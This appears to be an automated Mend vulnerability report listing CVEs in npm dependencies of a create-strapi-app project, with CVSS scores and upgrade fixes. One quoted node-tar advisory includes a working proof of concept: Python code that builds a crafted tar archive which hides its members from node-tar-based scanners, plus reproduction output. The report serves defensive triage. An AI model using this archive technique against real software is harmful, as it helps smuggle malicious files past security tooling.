- create-strapi-app-4.6.2.tgz (Root Library)
- inquirer-8.2.5.tgz
- external-editor-3.1.0.tgz
- ❌ tmp-0.0.33.tgz (Vulnerable Library)
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.
Publish Date: 2025-08-07
URL: CVE-2025-54798
CVSS 3 Score Details (2.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: High
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-52f5-9888-hmc6
Release Date: 2025-08-07
Fix Resolution (tmp): 0.2.4
Direct dependency fix Resolution (create-strapi-app): 5.41.0
Step up your Open Source Security Game with Mend here
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Vulnerabilities
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
Vulnerable Library - uuid-8.3.2.tgz
RFC4122 (v1, v4, and v5) UUIDs
Library home page: https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
uuid is for the creation of RFC9562 (formerly RFC4122) UUIDs. Prior to 14.0.0, v3, v5, and v6 accept external output buffers but do not reject out-of-range writes (small buf or large offset). This allows silent partial writes into caller-provided buffers. This vulnerability is fixed in 14.0.0.
Publish Date: 2026-04-24
URL: CVE-2026-41907
CVSS 3 Score Details (9.8)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-w5hq-g745-h8pq
Release Date: 2026-04-24
Fix Resolution: https://github.com/uuidjs/uuid.git - v11.1.1,https://github.com/uuidjs/uuid.git - v13.0.1,https://github.com/uuidjs/uuid.git - v12.0.1
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the "path-reservations" system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., "ß" and "ss"), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a "PathReservations" system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using "NFD" Unicode normalization (in which "ß" and "ss" are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which "ß" causes an inode collision with "ss")). This enables an attacker to circumvent internal parallelization locks ("PathReservations") using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates "path-reservations.js" to use a normalization form that matches the target filesystem's behavior (e.g., "NFKD"), followed by first "toLocaleLowerCase('en')" and then "toLocaleUpperCase('en')". As a workaround, users who cannot upgrade promptly, and who are programmatically using "node-tar" to extract arbitrary tarball data should filter out all "SymbolicLink" entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.
Publish Date: 2026-01-20
URL: CVE-2026-23950
CVSS 3 Score Details (8.8)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: High
- Availability Impact: Low
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-r6q2-hw4h-h46w
Release Date: 2026-01-20
Fix Resolution (tar): 7.5.4
Direct dependency fix Resolution (create-strapi-app): 5.36.1
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.
Publish Date: 2026-01-28
URL: CVE-2026-24842
CVSS 3 Score Details (8.2)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-01-28
Fix Resolution (tar): 7.5.7
Direct dependency fix Resolution (create-strapi-app): 5.36.1
Step up your Open Source Security Game with Mend here
Vulnerable Library - lodash-4.17.21.tgz
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Impact:
The fix for CVE-2021-23337 (GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.
When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.
Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().
Patches:
Users should upgrade to version 4.18.0.
Workarounds:
Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.
Publish Date: 2026-03-31
URL: CVE-2026-4800
CVSS 3 Score Details (8.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-r5fr-rjxr-66jc
Release Date: 2026-03-31
Fix Resolution: lodash-amd - 4.18.0,lodash.template - 4.18.0,lodash-es - 4.18.0,lodash - 4.18.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - tmp-0.0.33.tgz
Temporary file and directory creator
Library home page: https://registry.npmjs.org/tmp/-/tmp-0.0.33.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
tmp is a temporary file and directory creator for node.js. Prior to 0.2.6, the tmp npm package contains a path traversal vulnerability that allows escaping the intended temporary directory when untrusted data flows into the prefix, postfix, or dir options. By embedding traversal sequences (e.g., ../) or path separators in these parameters, attackers can cause files to be created outside the configured temporary base directory at attacker-controlled locations with the privileges of the running process. This vulnerability affects applications that pass user-controlled data to tmp's file/directory creation functions without proper input sanitization. This vulnerability is fixed in 0.2.6.
Publish Date: 2026-06-11
URL: CVE-2026-44705
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-05-27
Fix Resolution: https://github.com/raszi/node-tmp.git - v0.2.6
Step up your Open Source Security Game with Mend here
Vulnerable Library - lodash-4.17.21.tgz
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.
The issue permits deletion of properties but does not allow overwriting their original behavior.
This issue is patched on 4.17.23
Publish Date: 2026-01-21
URL: CVE-2025-13465
CVSS 3 Score Details (7.2)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: Low
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-xxjr-mmjv-4gpg
Release Date: 2026-01-21
Fix Resolution: lodash-amd - 4.17.23,lodash - 4.17.23,lodash-es - 4.17.23
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.
Publish Date: 2026-03-09
URL: CVE-2026-31802
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-03-09
Fix Resolution: https://github.com/isaacs/node-tar.git - v7.5.11
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.
Publish Date: 2026-03-07
URL: CVE-2026-29786
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: Low
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-03-07
Fix Resolution: https://github.com/isaacs/node-tar.git - v7.5.10
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.
Publish Date: 2026-02-20
URL: CVE-2026-26960
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-02-18
Fix Resolution (tar): 7.5.8
Direct dependency fix Resolution (create-strapi-app): 5.37.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.
Publish Date: 2026-01-16
URL: CVE-2026-23745
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-01-16
Fix Resolution: https://github.com/isaacs/node-tar.git - v7.5.3
Step up your Open Source Security Game with Mend here
Vulnerable Library - lodash-4.17.21.tgz
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Impact:
Lodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for (CVE-2025-13465: GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype.
The issue permits deletion of prototype properties but does not allow overwriting their original behavior.
Patches:
This issue is patched in 4.18.0.
Workarounds:
None. Upgrade to the patched version.
Publish Date: 2026-03-31
URL: CVE-2026-2950
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: Low
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-xxjr-mmjv-4gpg
Release Date: 2026-03-31
Fix Resolution (lodash): 4.17.23
Direct dependency fix Resolution (create-strapi-app): 5.37.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a Tar for Node.js. node-tar prior to version 6.2.1 has no limit on the number of sub-folders created in the folder creation process. An attacker who generates a large number of sub-folders can consume memory on the system running node-tar and even crash the Node.js client within few seconds of running it using a path with too many sub-folders inside. Version 6.2.1 fixes this issue by preventing extraction in excessively deep sub-folders.
Publish Date: 2024-03-21
URL: CVE-2024-28863
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: High
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-f5x3-32g6-xq36
Release Date: 2024-03-21
Fix Resolution: tar - 6.2.1
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Summary "tar" (node-tar) applies a PAX extended header's "size=" record (and other PAX overrides) to the next header entry of any type, including intermediary metadata headers such as a GNU long-name ("L") or long-link ("K") entry. Per POSIX pax, a PAX extended header ("x") describes the next file entry, not the intermediary extension headers that may sit between the "x" header and the file it annotates. Because node-tar lets the PAX "size" override the byte length of an intervening "L"/"K"/"x" header, an attacker can desynchronize node-tar's stream cursor relative to every other mainstream tar implementation (GNU tar, libarchive/bsdtar, Python "tarfile", and the now-fixed "tar-rs" / "astral-tokio-tar"). The result is a tar parser interpretation differential (CWE-436): a single crafted archive yields a different set of members under node-tar than under the reference tar tools. An attacker can use this to hide a member from one parser while it is visible to another, which defeats security tooling whose scanner and extractor disagree on archive contents (e.g. a malware/secret scanner that lists entries with one library while a downstream step extracts with another). node-tar is one of the most widely deployed JavaScript tar libraries (it backs "npm"'s own package-tarball handling and is a transitive dependency of a very large fraction of the npm ecosystem), so the blast radius for "files that extract differently depending on the tool" is broad. This is the same root cause and fix that was just addressed upstream in the Rust tar ecosystem ("tar-rs" / "astral-tokio-tar"); node-tar carries the equivalent defect and has no equivalent guard. Impact - CWE-436 Interpretation Conflict / inconsistent tar parsing (the same class as the prior tar "smuggling" advisories GHSA-j5gw-2vrg-8fgx and GHSA-fp55-jw48-c537). - A crafted archive can present one logical member list to a tool that lists or scans with node-tar and a different member list to GNU tar / libarchive / Python tarfile (and vice versa). This lets a malicious file be hidden from a scanner that uses a different parser than the eventual extractor, or hidden from node-tar-based inspection while still landing on disk via a system "tar". - No authentication is required; the only precondition is that a victim parses an attacker-supplied tar with node-tar. Tar archives are routinely fetched from untrusted sources (package registries, user uploads, CI artifacts, container layers). - Severity: Medium. Impact is integrity-of-archive-interpretation, not direct RCE; it is a building block for supply-chain / scanner-evasion attacks rather than a standalone code-execution primitive. Vulnerable code (file:line) "src/header.ts" (compiled to "dist/esm/header.js:49" and "dist/commonjs/header.js:85" in the published "tar@7.5.15"): // Header.decode(buf, off, ex, gex) this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12) "ex" is the currently-accumulated PAX local extended header and "gex" the PAX global header. The "size" override from "ex"/"gex" is applied unconditionally to whatever header is being decoded next — there is no check that the header being decoded is a real file entry rather than an intermediary extension header. "src/parse.ts", "[CONSUMEHEADER]" constructs the next header with the current "EX"/"GEX" applied: const header = new Header(chunk, position, this[EX], this[GEX]) and later branches on whether that header is a metadata entry. "this[EX]" is cleared only in the non-meta (real file) branch: if (entry.meta) { // L / K / x / g metadata entries: this[EX] is left intact here if (entry.size > this.maxMetaEntrySize) { entry.ignore = true this[STATE] = 'ignore' entry.resume() } else if (entry.size > 0) { this[META] = '' entry.on('data', c => (this[META] += c)) this[STATE] = 'meta' } } else { this[EX] = undefined // EX cleared only once a real file entry is reached } When the stream is ordered "x (PAX, size=N) -> L (GNU long-name) -> file", the "L" header is constructed with "this[EX]" still set, so its "size"/"remain" becomes "N" instead of the "L" payload's true length. node-tar then consumes "N" bytes of "metadata" and resumes header parsing at the wrong offset, landing mid-stream. Every other mainstream parser applies the PAX "size" only to the following file entry, so they stay synchronized. The correct behavior (and the fix shipped upstream in the Rust tar ecosystem) is to not apply PAX "size"/overrides when the entry being decoded is itself an extension header ("L" GNU long-name, "K" GNU long-link, "x" PAX local, "g" PAX global). How input reaches the sink "tar.list()", "tar.extract()"/"tar.x()", and "tar.Parse"/"tar.Unpack" all route every 512-byte header block through "Header.decode(...)" with the currently-accumulated "EX"/"GEX". Any consumer that parses an attacker-supplied archive — "tar.list", "tar.extract", or piping into the streaming "Parser" — reaches the sink. No options need to be enabled; the default code path is affected. Proof of concept Archive layout (all standard, GNU-tar-producible blocks): block 0 : x header (PAX local extended, typeflag 'x'), its own size = len(pax body) block 1 : x payload : the single PAX record "...size=2048\n" block 2 : L header (GNU long-name '././@LongLink'), real size = 13 block 3 : L payload : "longname.txt\0" (the long name for the next file) block 4 : file header 'file_a', size = 16 block 5 : file_a body (16 bytes, zero-padded to 512) block 6 : file header 'file_b', size = 16 block 7 : file_b body (16 bytes, zero-padded to 512) Generator ("make_tar.py", pure stdlib, no external deps): def hdr(name, size, typeflag): h = bytearray(512); name = name[:100]; h[0:len(name)] = name h[100:108] = b'0000644\0'; h[108:116] = b'0000000\0'; h[116:124] = b'0000000\0' h[124:136] = ('%011o\0' % size).encode(); h[136:148] = b'00000000000\0' h[156:157] = typeflag; h[257:263] = b'ustar\0'; h[263:265] = b'00' h[148:156] = b' ' * 8 cs = sum(h); h[148:156] = ('%06o\0 ' % cs).encode() return bytes(h) def pad(d): return d + b'\0' * ((512 - len(d) % 512) % 512) def pax_record(key, val): # length-prefixed PAX record "LEN key=val\n" body = b' %s=%s\n' % (key.encode(), str(val).encode()); n = len(body) while True: s = str(n).encode() + body if len(s) == n: break n = len(s) return s pax = pax_record('size', 2048) # malicious: claim size=2048 for the "next" entry out = hdr(b'PaxHeaders/x', len(pax), b'x') + pad(pax) out += hdr(b'././@LongLink', 13, b'L') + pad(b'longname.txt\0') out += hdr(b'file_a', 16, b'0') + pad(b'AAAA_file_a_body') out += hdr(b'file_b', 16, b'0') + pad(b'BBBB_file_b_body') out += b'\0' * 1024 open('pax-desync.tar', 'wb').write(out) A negative-control archive is identical except the PAX record is "pax_record('comment', 'x')" (no "size="), written to "pax-control.tar". End-to-end reproduction (against pinned version "tar@7.5.15", latest release) Install the published package into a clean project and parse both archives: $ npm init -y >/dev/null && npm install tar@7.5.15 $ node -e "console.log(require('tar/package.json').version)" 7.5.15 $ grep -n "ex?.size ?? gex?.size" node_modules/tar/dist/esm/header.js 49: this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12); "e2e.mjs": import * as tar from 'tar' async function listEntries(f){ const got=[], warns=[] await tar.list({ file:f, onReadEntry:e=>{ got.push({path:e.path,size:e.size,type:e.type}); e.resume() }, onwarn:(code,_msg)=>warns.push(code) }) return { got, warns } } const mal = await listEntries('pax-desync.tar') console.log('MALICIOUS entries :', JSON.stringify(mal.got), 'warnings:', JSON.stringify(mal.warns)) const ctl = await listEntries('pax-control.tar') console.log('CONTROL entries :', JSON.stringify(ctl.got), 'warnings:', JSON.stringify(ctl.warns)) Verbatim output: === Deployed-consumer E2E: npm tar@7.5.15 (latest release) === [MALICIOUS] archive = x(PAX size=2048) -> L(GNU longname "longname.txt") -> file_a(16B) -> file_b(16B) tar.list() entries : [] tar.list() warnings: ["TAR_ENTRY_INVALID"] [NEGATIVE CONTROL] same archive, PAX record is "comment=x" (no size= override) tar.list() entries : [{"path":"longname.txt","size":16,"type":"File"},{"path":"file_b","size":16,"type":"File"}] tar.list() warnings: [] Reference parsers on the same "pax-desync.tar": $ tar tvf pax-desync.tar -rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # GNU tar $ bsdtar tvf pax-desync.tar -rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # libarchive $ python3 -c "import tarfile; print([m.name for m in tarfile.open('pax-desync.tar').getmembers()])" ['longname.txt'] # Python tarfile Interpretation differential: GNU tar, libarchive (bsdtar), and Python "tarfile" all extract the member "longname.txt" from "pax-desync.tar", whereas node-tar "7.5.15" desynchronizes, raises "TAR_ENTRY_INVALID" (checksum failure from landing mid-stream), and reports zero members. The negative control proves the divergence is caused solely by the PAX "size=" override being applied to the intermediary "L" header — when the same archive carries a PAX record without "size=", node-tar parses it identically to the reference tools ("longname.txt", "file_b"). Suggested fix When decoding a header, do not apply PAX "size" (or other PAX overrides) if the header being decoded is itself an extension header. Concretely, in "src/parse.ts" clear/ignore "this[EX]" (and "this[GEX]" for "size") when the header's type is "ExtendedHeader", "GlobalExtendedHeader", "NextFileHasLongPath" (GNU "L"), or "NextFileHasLongLinkpath" (GNU "K"); equivalently, in "Header.decode", gate the "ex?.size ?? gex?.size" override on the decoded type not being one of those extension types. This mirrors the upstream Rust fix, which guards "pax_size" with "is_gnu_longname || is_gnu_longlink || is_pax_local_extensions || is_pax_global_extensions". A fix PR is being prepared against a private fork and will be linked here. Fix PR To be linked from a private fork of the repository (the fix will not be pushed to any public fork or to upstream during embargo). Credits Reported by tonghuaroot.
Publish Date: 2026-06-15
URL: CVE-2026-53655
CVSS 3 Score Details (6.2)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-vmf3-w455-68vh
Release Date: 2026-06-15
Fix Resolution: tar - 7.5.16
Step up your Open Source Security Game with Mend here
Vulnerable Library - cookie-0.4.2.tgz
HTTP server cookie parsing and serialization
Library home page: https://registry.npmjs.org/cookie/-/cookie-0.4.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
cookie is a basic HTTP cookie parser and serializer for HTTP servers. The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie. Upgrade to 0.7.0, which updates the validation for name, path, and domain.
Publish Date: 2024-10-04
URL: CVE-2024-47764
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-pxg6-pf52-xh8x
Release Date: 2024-10-04
Fix Resolution (cookie): 0.7.0
Direct dependency fix Resolution (create-strapi-app): 5.0.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - semver-7.3.8.tgz
The semantic version parser used by npm.
Library home page: https://registry.npmjs.org/semver/-/semver-7.3.8.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
Mend Note: The description of this vulnerability differs from MITRE.
Publish Date: 2023-06-21
URL: CVE-2022-25883
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: Low
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-c2qf-rxjj-qqgw
Release Date: 2023-06-21
Fix Resolution (semver): 7.5.2
Direct dependency fix Resolution (create-strapi-app): 4.12.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - tmp-0.0.33.tgz
Temporary file and directory creator
Library home page: https://registry.npmjs.org/tmp/-/tmp-0.0.33.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.
Publish Date: 2025-08-07
URL: CVE-2025-54798
CVSS 3 Score Details (2.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: High
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-52f5-9888-hmc6
Release Date: 2025-08-07
Fix Resolution (tmp): 0.2.4
Direct dependency fix Resolution (create-strapi-app): 5.41.0
Step up your Open Source Security Game with Mend here